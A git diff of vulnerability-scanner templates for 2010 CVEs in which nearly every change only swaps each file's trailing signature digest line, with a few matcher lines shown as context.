b/http/cves/2010/CVE-2010-1306.yaml index 8763eab003..353ea8f0a5 100644 --- a/http/cves/2010/CVE-2010-1306.yaml +++ b/http/cves/2010/CVE-2010-1306.yaml @@ -38,5 +38,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402202df6bbc50d7cc8368259ac5c6184d04e75048880177d47c07f728aefb1668442022026f12aeb3c65ada4eab3bc49dbc9949d4657858b787fc536c26c3160c8106b4e:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022060f8224c933cfcc942a9cbded1f3fd308a62fc2b0b93fd440d4bc56ab08bd22d022100af6d159a858360f6a63ab35cecf6277ceca4fe36e5c0d9fa03491aff91494148:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1307.yaml b/http/cves/2010/CVE-2010-1307.yaml index 2bfd98223a..4ef9da4957 100644 --- a/http/cves/2010/CVE-2010-1307.yaml +++ b/http/cves/2010/CVE-2010-1307.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502205e86c6b24b4ecb46d4afcf38d506bcf7f4cfff13f36cd2eee63089da70b0b868022100856040c0237849b063be5541a915d7316bfd4b92d07e69fa1b5ffdccb4823826:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100977eb986f0175c55b7ddf234cf42f8333687d82008fbc1d9574d7da261cafce1022100bf65b650ede1bb05ba220481ceb87f709093028f7a49aa0aa814f3e826dbc248:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1308.yaml b/http/cves/2010/CVE-2010-1308.yaml index 3adfacf0f3..2a7fee8440 100644 --- a/http/cves/2010/CVE-2010-1308.yaml +++ b/http/cves/2010/CVE-2010-1308.yaml @@ -38,5 +38,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100ab845e16687ce7394f1946b78ec0391abc76843c858d48749c49726df35b2825022100e0686a546d0be89423fdb2ac2236db2c58678e0cf8d0c4000cf95332a695001b:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100f1791394bd86a7d97b66377af6f5d1055babf51df3785ec4acba3f2b74c890110220779e97e280fc8d0d371f7445ea62cf1dce4619ff7ada4cc3bb7363f294cf89c7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1312.yaml b/http/cves/2010/CVE-2010-1312.yaml index d71c2150f8..3c49a1fbaf 100644 --- a/http/cves/2010/CVE-2010-1312.yaml +++ b/http/cves/2010/CVE-2010-1312.yaml @@ -38,5 +38,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100b66da8f11f27a19ee5eb13ac43eaf15f982cf603dbfac58c05c64ba33856016c02201f31008b5c95173798587761cbacde6ed0dbe642cef56b80bd5665f066b3170a:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502204ba7923bfe3e1cb8950bdf405427a9e23ff298d5a573f9f370a305bc9dd46d22022100db7994664a56864821f3f0a8b44fa959003926b83e750661a1ac4c3e619d1a07:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1313.yaml b/http/cves/2010/CVE-2010-1313.yaml index 59ad85588d..846664ff33 100644 --- a/http/cves/2010/CVE-2010-1313.yaml +++ b/http/cves/2010/CVE-2010-1313.yaml @@ -38,5 +38,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100b3023459497fd023667bd23f69c5d79e989e120a4f4d4b902de91f25b0303c1102207bfa0050b332ae808843e6d6dd97f61130c9d6e6c4aa8d55644d1d59dd2e1171:922c64590222798bb761d5b6d8e72950 +# digest: 490a004630440220394944f1aca18a98e6508a1e5ea50522ea51a31010d3fe964e1d30d886cf783102205cdc1890cac6f1fdb5145a602098dfce8bb816ed369ee62b5474b79689d62774:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1314.yaml b/http/cves/2010/CVE-2010-1314.yaml index 77b4a5ee58..98e54769d4 100644 --- a/http/cves/2010/CVE-2010-1314.yaml +++ b/http/cves/2010/CVE-2010-1314.yaml @@ -38,5 +38,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100a3a8e923bd287eb99e43d17cfcb86977d3117ab38c87cd12cb582aab308ef4b40220212cf2131eb3c0a4ce8622b00360c9803c7e0c505b742223fec1e4e11d19a1f0:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100b5506376e964b1166a282b5ad306eb01c8c461f4830701c5e5b0f84444fd1a66022100891e788b735397964d8bfa657efd77b1632575e0c4299d9128dcad2a0ba60b4e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1315.yaml b/http/cves/2010/CVE-2010-1315.yaml index 9fdf9a0dda..afacf8cbac 100644 --- a/http/cves/2010/CVE-2010-1315.yaml +++ b/http/cves/2010/CVE-2010-1315.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100cb30289178cac99e34cb8ca62f6462b7452d8c03c88c272c51392463ba7c000f022100e8d73b86a88d672d1cd610ec7645ce88a04685ffd9810a631afc73d3dad7bf3a:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100ca00bc725bc266fc3057b46cad3eff57bb4d0882fab2759eea2d0ad8f8a7609902206bbd6fb968fd51a904544ccd8568811b186986800c7fdcc0d3a8f6b9ab44e25b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1340.yaml b/http/cves/2010/CVE-2010-1340.yaml index fda03a8ec0..68f56bc306 100644 --- a/http/cves/2010/CVE-2010-1340.yaml +++ b/http/cves/2010/CVE-2010-1340.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100f4d995506543d30fe5c868a1d7cb9f0e3bba77ec70c2df920053c15e44ced48c02206486f126b4e4a609a1cc858bc0de00938f33c55ba9c14c80aded301ade3ef340:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100adf1ec26d20fd0ed411cd1c1cb346f9b1df9be477ee020883fa8a0d151f895c1022100c8bfb05d3fb37a7d5c0916a194c713e94da325edc21085a424650c2a5f906b89:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1345.yaml b/http/cves/2010/CVE-2010-1345.yaml index 11776706ff..a3c7d91a14 100644 --- a/http/cves/2010/CVE-2010-1345.yaml +++ b/http/cves/2010/CVE-2010-1345.yaml @@ -38,5 +38,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022033ebd8edc048ce4653495f563460b4f7fe05cc413a086392f526fc3f9938822d0221009ac9dd56d2999373c20eee533aaff2ddf0519372940f32146c7419044589224d:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100dc0a1c6a1da64202828d550ff5ccbcfcdacca334be68f908983a71cc1ed652d1022100b59ea2378a9305c93e2549d036c520c09d0ddb0dc13c3222753a344c04a9fe8a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1352.yaml b/http/cves/2010/CVE-2010-1352.yaml index a600e3d207..5fafc41387 100644 --- a/http/cves/2010/CVE-2010-1352.yaml +++ b/http/cves/2010/CVE-2010-1352.yaml @@ -38,5 +38,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402200b73843e2463f5a6fe29cf1427f706e0ca3047fa9e624f3ba45905f7c2f771d0022055fbe68ee1440edf07fc88689456e3c565572cc6b5d3503e7988a16caf01a6c0:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402200bc4604af28a8a69301577ae2207c4e74eb22f4474b0c56623219ea67d8b61b40220674985c6969dbfd3c209d3390817c3ec9a2771f24e0b7492b89f68db7424bfc5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1353.yaml b/http/cves/2010/CVE-2010-1353.yaml index 710c43dded..44c4eb696b 100644 --- a/http/cves/2010/CVE-2010-1353.yaml +++ b/http/cves/2010/CVE-2010-1353.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100d665c7f0fb0f414afd94f1dba980b4f650853cfe790377b484be1d53c9fb2cfd022100eda66e141ee99de501cc8e41d437e0aa290f26bfe08078cda96316193d8b1c50:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402203917b4123306899765ffed4241747e86b085dc3b7041dae7e10f2f1937bd8929022065ed467a70cbec1ad1c04325dc72f28dc9bbf3f01e2aabc13f9687fa96850416:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1354.yaml b/http/cves/2010/CVE-2010-1354.yaml index e83850c109..ac881637d4 100644 --- a/http/cves/2010/CVE-2010-1354.yaml +++ b/http/cves/2010/CVE-2010-1354.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100cd8547386fbfc1ba0e30a326035ac207235a54679367415f6a3c680b21a8083202202e3cbcad6032aeb420ac28a2587b2cb3c1b7dede66774fbb7d0e00b775f10077:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402200964f84ad28a587b49a15042b692066d2086537b0755c0cec01844eaf7d8a8d702204532c2d0a93f950f2c806140786951c3e8c694110892493f24d4bd1d8387c1f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1429.yaml b/http/cves/2010/CVE-2010-1429.yaml index 6271ec8d18..d9b4db9d60 100644 --- a/http/cves/2010/CVE-2010-1429.yaml +++ b/http/cves/2010/CVE-2010-1429.yaml @@ -47,5 +47,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402206853d100fb1b0a8e5031a836cbd955afd6535263364e018002af89b86a6e38fb02200c3130cf954d066b48b7dceffc7ca9204d13160742b673f268825e5f63eeb1bf:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502206017b2bf994b1d880dde7aea15852e5069cb7a88d73c7524d49706e345239286022100db2e56ac1747129b291dc9cfdaad053ff93b44f740ef16733f33c381932fa416:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1461.yaml b/http/cves/2010/CVE-2010-1461.yaml index a993036e0c..1dae340b57 100644 --- a/http/cves/2010/CVE-2010-1461.yaml +++ b/http/cves/2010/CVE-2010-1461.yaml @@ -38,5 +38,4 @@ http: - type: status status: - 200 - -# digest: 4a0a0047304502210097b8cfc292bf3f3facb7d4225137141e5c503177794328a1525882312e5d33ac02200779d032fb4b04d02b4ad0a4b4d5300ed4b8a66cc72c7762d04571663a23e75c:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402200edbac95c1ba91183068c46e231561849abe738cb951e1f4560e3824d0d03f1502205bdb9a8f1e2e3abc2ef2d2a263d18d811f77edd4414fea51fdcaf61c64f69fab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1469.yaml b/http/cves/2010/CVE-2010-1469.yaml index 6fe3dd9eb1..08d963f92b 100644 --- a/http/cves/2010/CVE-2010-1469.yaml +++ b/http/cves/2010/CVE-2010-1469.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402205c978b1c47f85c1b51061d169c5eb7631cdd9c6c2d612200dec29fda57fabe1b0220507d86d5d8c9164a8f26a6549ad5e3d0af4285f8711a7ec5b58da6cb7bcba3fb:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100e37946366b693b5e024e8ddccd405fa27c32d2ddc64385ef9e055a9eb378fb54022036391f7a744ab0223caffb6359b030d5bcc98efc18ee3b6deb2493e59d8c6f68:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1470.yaml b/http/cves/2010/CVE-2010-1470.yaml index 7280dadb98..764b00f2a6 100644 --- a/http/cves/2010/CVE-2010-1470.yaml +++ b/http/cves/2010/CVE-2010-1470.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100aa3197d11bc16fc8ee1ccb9a4101baac0d27470d024cfc16bdb234ddf2d98f57022100e3900d14b5143d172f65959a05ea5412c68c884a467e9c8127d817270fbe73b6:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100d86b629860fe8bbbfc0f934010f74aa98cf801cdccee7e88c089e013ebde7e4f0221009b3496ef163e7cafae67428fa6a444d98a7a821d12ba5cff655824d39ff58a78:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1471.yaml b/http/cves/2010/CVE-2010-1471.yaml index 37616c9695..dc7bc011a5 100644 --- a/http/cves/2010/CVE-2010-1471.yaml +++ b/http/cves/2010/CVE-2010-1471.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 4a0a004730450220091f45f1bb929a6acc4d68e0f76dbedad7ac8ed558c517aa3d80e8f3980dbafb022100fa4b496a564614c6924066415c88b37a8cf0c22ec0a551ee0243ba1eba803fb8:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100dc6b81fcbb2332ae132713ba032399df94b930328b90ae83634b23501784fc30022065c6cd8fd6de709808c44d496bd0126fc2b87daf98f9d6afc77a16726889bcef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1472.yaml b/http/cves/2010/CVE-2010-1472.yaml index 479725f32e..306458c223 100644 --- a/http/cves/2010/CVE-2010-1472.yaml +++ b/http/cves/2010/CVE-2010-1472.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100bccbd1e9ee053ac9e46e9fe02ce4ba8b8ab7a45f61e18f88bae127c18959eea2022100a0ae9fc4caa042eddbf836e530bdb9070c729ecd61432b3afee7e1143643faec:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022013c1652993e9c855e37c290978a404bcfc7deb0cf484a0165283d47d2e233bbb02205791bee765783ba5de9456472b640441b85852941922bd0a3ce3576d2dd4b6df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1473.yaml b/http/cves/2010/CVE-2010-1473.yaml index f49427dd63..d660467a5e 100644 --- a/http/cves/2010/CVE-2010-1473.yaml +++ b/http/cves/2010/CVE-2010-1473.yaml @@ -38,5 +38,4 @@ http: - type: status status: - 200 - -# digest: 4a0a004730450221009d8087eb5640e8a879f0b3c653086ccb9f3a4ace2026cc1dc7bdca2c38a619b70220736327ca1b9f8fefa9a6476fa5c6a0405be0ba84982a6de34d11f6b288aac115:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100deb3701eb94b50a9cfe05f3e200c01374a4297622d7cb11c3687a87160109182022100f1bc0ec8cc540cbb8460c22b15ff8d9923406cdfa38ca1a28290506825e7848c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1474.yaml b/http/cves/2010/CVE-2010-1474.yaml index 1b7536378b..2248342224 100644 --- a/http/cves/2010/CVE-2010-1474.yaml +++ b/http/cves/2010/CVE-2010-1474.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 4a0a004730450220604489eae224516bde408e712c6c6267dbaa1bb8fe8ed67bee521102fbbe83ea02210098b330a0542095b8f56f2ee974bddd8cc1b314b907fa700648cd17b432b788bd:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022025799e437850dc1ad88ae5fb2df7cb6cb6091eeadf215f674452d09c6aec17a302205ebd22423d7e476d36821a69684e5263b7c067a3352377a9fbd15b8f4e57358a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1475.yaml b/http/cves/2010/CVE-2010-1475.yaml index a9780db27f..4190f82fa0 100644 --- a/http/cves/2010/CVE-2010-1475.yaml +++ b/http/cves/2010/CVE-2010-1475.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022003a8f0a17966c6aac8c4c7d69fec398251be1920d377473475d434b72e785b9f022100f45e0538786f63179fb8e33277b8e8fe6451243f4e0f7542ee80ca3f6cee1db5:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022017d4b3fbf5e6125fec8c151f716934fb9b777119d320b50bc15811a209cdbdf60220265ee9c82b8cd66bcb045e1bc02d1d30e9805c496f04eed99afee7f9201c3fb2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1476.yaml b/http/cves/2010/CVE-2010-1476.yaml index c5eaac8617..897a846119 100644 --- a/http/cves/2010/CVE-2010-1476.yaml +++ b/http/cves/2010/CVE-2010-1476.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 490a00463044022051d183b9eaecce287a500f763945967601bf00003688a9da6b05fb4029d91f05022053d4c28c3aaf7094ccb73c81940417e58a38c6371e23d6276410642a728eaa1a:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022062d350dec181362553d6ca2a3d237ac08079730d0b654d53e1e5a950a6cbea0c02204ba12524db1ada691a27a79b975b4bbc138be83d7d914d3437f87b036c6a2097:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1478.yaml b/http/cves/2010/CVE-2010-1478.yaml index d0a355f388..4c3fc3e573 100644 --- a/http/cves/2010/CVE-2010-1478.yaml +++ b/http/cves/2010/CVE-2010-1478.yaml @@ -37,5 +37,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100c00767d832ccc0e7a9edb0ae3ba58075325f96d52f710f0d15128366195bccec022100815dcff9ef6c43991808b0227417d24ff4e1850d54a7b6c5d66facecfb37e13d:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450221008983e356a6b0d98202ebdd420a2098f71c5ccd44cdbe665b336be187547b855d02205aa423954ddd7f1a957f043aa646c12184fe37b199a1b4d4eaa6f81e11f95e3d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1491.yaml b/http/cves/2010/CVE-2010-1491.yaml index 859dbac44f..8984be853e 100644 --- a/http/cves/2010/CVE-2010-1491.yaml +++ b/http/cves/2010/CVE-2010-1491.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 490a0046304402200d14fe03a30656f4024e43d9c1b33112c896cb14b5cc1275125c442a286eaebd02206bad6bb225f2bd6731eb2bbc9b8d3a42230f5e681b4403858def43f7505e23b6:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100ec72549ed1f8c36dcea4d19a7676935587140c02b21f52ea40c58dab218ad077022100fdfa469c75a0ab76bff81676520d5e1399dd549de97bc97e223a9183b34e1675:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1494.yaml b/http/cves/2010/CVE-2010-1494.yaml index 4c237d2820..9237cdc03b 100644 --- a/http/cves/2010/CVE-2010-1494.yaml +++ b/http/cves/2010/CVE-2010-1494.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 490a004630440220678cb1f8e8ba9f8af67849992c9ff45fd32d95989f3798f257282ee79a24662e02201985cdb2da03b969a742957679cc291f966d7173d2b7d93450478bc6041229f7:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100cfa3085f405d91be4bacf720273a0e5f5c3f011c8f06f12d4092a9620623abb80221009c63ca52c15aad5ae7ccdb642249bcb7aa676fd8b8a207a140ef4b92ab4f6ed8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1495.yaml b/http/cves/2010/CVE-2010-1495.yaml index 081672816d..cc172baa4b 100644 --- a/http/cves/2010/CVE-2010-1495.yaml +++ b/http/cves/2010/CVE-2010-1495.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100ff0a10198ab0f5c2372fcdc062776d46c1783ccca3230b1237a2657d9127d87d02202591ad4f2fc800a5f11b9414f88c19363e382958dc8f758810020c219598d3bc:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100c89f3ceab0380f4b368dfa8e8a19d0389d3ee8e2a3d830aa6d83253a1ed5248d022100e35ead7e89135255dc84d517fbaaaa73b589275f12084ca12e6df6e1a23cf254:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1531.yaml b/http/cves/2010/CVE-2010-1531.yaml index ddc0088791..f655d56a72 100644 --- a/http/cves/2010/CVE-2010-1531.yaml +++ b/http/cves/2010/CVE-2010-1531.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 490a004630440220235c15c454aa2f324d49b02ff1fbc2e5ff2acaad697e8465e5fff0c1ee4b1d3c02206f875422ad9fa30d97d158ac23843af237ca60b603f20663d377deb81f4dd0ef:922c64590222798bb761d5b6d8e72950 +# digest: 490a00463044022079339cb8c55c4ebf6d174e472d6dc2923c40839d560f9a8c348e87141f214ad3022041548891ca6ff77c5d45cf5037adb9b25778f5bb4b09dbc876baddf6e945fd9f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1532.yaml b/http/cves/2010/CVE-2010-1532.yaml index ae763db5c1..2e87159969 100644 --- a/http/cves/2010/CVE-2010-1532.yaml +++ b/http/cves/2010/CVE-2010-1532.yaml @@ -38,5 +38,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100c7797639b2ca35b3c7cf614b99ee0eecb73b9667040b9aedfc9e4828cb87269b022100bebd9a6117278c91fa0d5e9544c167ebc27405688df9dbd76106e840c02ceb61:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100dfca1ff9baa3e9d76f297ca105bf57d0f6b9d035cff40caaa7d88a98e560211e022070905973434abc41142a7318096fd775591aa0ecb0ecfbea0180b68549a50fe0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1533.yaml b/http/cves/2010/CVE-2010-1533.yaml index e37923e8dc..ec5c68e99a 100644 --- a/http/cves/2010/CVE-2010-1533.yaml +++ b/http/cves/2010/CVE-2010-1533.yaml @@ -38,5 +38,4 @@ http: - type: status status: - 200 - -# digest: 490a00463044022050ec8462820e3b7401fcd13be531e4d729de530096306014efced9fe1fdcc87102204ed34527c7db6a0e6583d5da7cb36d9dbb59b0fbf72897eb7b75e7968c05c255:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100d9bc4eedcef377b40fafcb6a98a7553415c09b013b5392e815b46ba712e8e658022100d8bec7523576199fe964513dbf4462851095b27375108651cb2553d7428dc5e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1534.yaml b/http/cves/2010/CVE-2010-1534.yaml index 3db5585924..686bbe795b 100644 --- a/http/cves/2010/CVE-2010-1534.yaml +++ b/http/cves/2010/CVE-2010-1534.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 4a0a004730450221009251075ab83c0eac5ac0ff75e7ae8398d6f2c71f23db2abe33e98fb4a107513f02204c5f3bbe4c2e03ca3ed1407c00586e2569570458945f61f21ac638bcb9f9f432:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100886e1aff81d87c6f1940b79d74df5d04ba516740e5529c0fd9e83479bdff7486022100f72c85d05e0745088d270c1a62f1b1f036ec2561547ebe2bf6d72ead03cad0aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1535.yaml b/http/cves/2010/CVE-2010-1535.yaml index 3e516a127a..6869a92c81 100644 --- a/http/cves/2010/CVE-2010-1535.yaml +++ b/http/cves/2010/CVE-2010-1535.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100bfb7f1f29f156e0972f2f33e49509e5c2177fe7dbae29397f27c54b8c05675af02210091d97c39a1401f76358f65b65481c6c08ac07a6e443c8dc497b179f3f925152b:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502205d3bd774c433d907e104bc398b0c70a717fba6f6fd31affd0ffc9a7e35382909022100877ac2c024b680c63f31963f7145f6cbea7ba9f89a8020dfd01edbf16c1464de:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1540.yaml b/http/cves/2010/CVE-2010-1540.yaml index ed5dee3f16..02e2854019 100644 --- a/http/cves/2010/CVE-2010-1540.yaml +++ b/http/cves/2010/CVE-2010-1540.yaml @@ -38,5 +38,4 @@ http: - type: status status: - 200 - -# digest: 4b0a004830460221009249f342aa9d8d5d486db14e2772e79ee7d93128cd801b985eb8a6c995504dc90221009db2d38d77a93cefd75c11a12181219335e73e9b92f5553b95985f62d9102fb8:922c64590222798bb761d5b6d8e72950 +# digest: 490a0046304402203935060b93e143cd05d0a8f54dd65c5be427d50887a9d41882bd9c90a9f52b6002203f53e87d3461d3b90144b90c236709c516b065080b48050233be22b7a501fc84:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1586.yaml b/http/cves/2010/CVE-2010-1586.yaml index 85d91f8d68..4a1c20e0df 100644 --- a/http/cves/2010/CVE-2010-1586.yaml +++ b/http/cves/2010/CVE-2010-1586.yaml @@ -36,5 +36,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:http?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' - -# digest: 490a0046304402206a8738dda2cd099286ee9a31727966f4b64016707b00ee806d498526faadf8db0220275c3b15bd6d2666565b016541599764c960c2607a7150613f3148c81c22d4cb:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100e09ac03a327a9a1cc032f36d4e4e5a4af9a042db69de570497dc054d29b23bd602207b4bbfa9ffc3dd09b6190d92949e3923e1584b0acec05a63c2c3711a31e1ee51:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1601.yaml b/http/cves/2010/CVE-2010-1601.yaml index a3dff32124..6925b24ab4 100644 --- a/http/cves/2010/CVE-2010-1601.yaml +++ b/http/cves/2010/CVE-2010-1601.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100d2ce638b3945d7d7ce8710a20a8560f536df012ac238a26070a6d7605ba6bc49022100c0d3a8211d0d8a84bc8740a6bbb0a04db418cfd79602d649bebae7097f0983fa:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100f17b50967ee700dc4a0b7e82d5619e7b5bbc757a2a8e047aad3156f43817167b022100b04168a6169d2bad208981928db603eb8259aa08a4edba781198165052061f7e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1602.yaml b/http/cves/2010/CVE-2010-1602.yaml index 84e902f139..008f6c6757 100644 --- a/http/cves/2010/CVE-2010-1602.yaml +++ b/http/cves/2010/CVE-2010-1602.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 4b0a00483046022100f69ef66241855c48a4c59d0401e9a47821330806a2ee261f0a6e278c46015af5022100e4491a3c6f0bb7ffc52c728a9396b5352837338fc084378f89e68ccb1b00fdbd:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100b9ce2cc6f48dd57cb6141f2272d8d70bfa37ae677cc51b34041f220c2c8b49c40220192b2401b07cc34b6088566f03b6dbaf9024d38dff86d84f668b255fb1fd03cc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1603.yaml b/http/cves/2010/CVE-2010-1603.yaml index cb22425096..9513e0020e 100644 --- a/http/cves/2010/CVE-2010-1603.yaml +++ b/http/cves/2010/CVE-2010-1603.yaml @@ -38,5 +38,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100a9f3e9e945e4b26299088c72439621695edac27cf754eb80c83eb822da0ce21c02205d27bc064e4e2aa3af5b19fd7730b14d609044b6b8553477684612522c9d9de5:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100be8b2549555b193525fbd94bf6756e70ffeb31b6842ac5a8402623bb0bd3ec99022100ae0ee5759953b2c330c6429ce94c7a13b625439bb5be0c264bd7e214f7900c22:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1607.yaml b/http/cves/2010/CVE-2010-1607.yaml index 09bce378ea..4abae4e2e8 100644 --- a/http/cves/2010/CVE-2010-1607.yaml +++ b/http/cves/2010/CVE-2010-1607.yaml @@ -39,5 +39,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100b49b3c5d9b9d1abb6fd9876fb528b463bb9df31affe7ece41d4569d8e22dfb1d022055bea7fcf2fc8fba034d57cbde552997e33f0653bda102ed931384c662a58ee6:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502210080f4ded964fcab5fc10f204ea1acdbea298f8163060470fd3c8b56437a03e25202200425e4b2b2c820f27e4dcdcc76c3711932c54e0403dd35007c19d7b25e9bdf38:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1653.yaml b/http/cves/2010/CVE-2010-1653.yaml index 44386e278f..3c32b342f9 100644 --- a/http/cves/2010/CVE-2010-1653.yaml +++ b/http/cves/2010/CVE-2010-1653.yaml @@ -40,5 +40,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022008dd24e6c70f3e1248105d29b0c3ad8b2daea6145e68ec908645fdd6e3c53a39022100c5b151e03436e6b7d382da8d87c291334f0d439fad02c09e41505cd84c256cd9:922c64590222798bb761d5b6d8e72950 +# digest: 